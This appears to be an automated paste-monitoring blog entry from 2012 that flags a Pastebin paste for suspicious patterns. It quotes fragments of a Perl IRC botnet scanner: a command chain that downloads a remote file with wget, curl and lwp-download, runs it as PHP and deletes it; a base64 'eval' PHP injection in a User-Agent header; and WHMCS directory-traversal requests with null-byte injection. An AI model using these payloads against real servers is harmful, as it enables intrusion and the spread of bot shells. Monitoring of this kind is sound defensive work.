Detected 4 occurrence(s) of ‘\< \?[php]*.*eval\(.*\>‘:

hell2.";php spread.jpg;rm -rf spread.jpg;wget ".$botshell2.";php spread.jpg;rm -rf spread.jpg;curl -O ".$botshell2.";php spread.jpg;rm -rf spread.jpg;lwp-download ".$botshell2.";php spread.jpg;rm -rf *.jp*;');";
    my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>");
    $ua->timeout(7);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
}


########################## end testing whm lfi
sub e107() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $e

Detected 8 occurrence(s) of ‘http:\/\/.*\.\.\/\.\.\/\.\.’:

                my $check = &get_content("http://".$site.$bug."x0r&templatefile=../../../../../../../tmp/0wned%0000"); sleep(2);
					&get_content("http://".$site.$bug."x0r&templatefile=../../../../../../../tmp/files1%0000");sleep(2);
					&get_content("http://".$site.$bug."x0r&templatefile=../../../../../../../tmp/files2%0000");sleep(2);
                            if ($check =~ /Owned by x0r/) {
                                &msg("$chan","$whmcslogo(4±8$enginex15)15(8±5SHeLL15)13 ".$shell." 15(4±3".$sys."15)15(8±5$nob0dy15)");sleep(2);
  

Source: http://pastebin.com/raw.php?i=mmEBmUw8

Tags: Directory Transversal, Obfuscated PHP Code, pastebin.com

This entry was posted on Monday, June 25th, 2012 at 11:01 and is filed under PasteMon. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.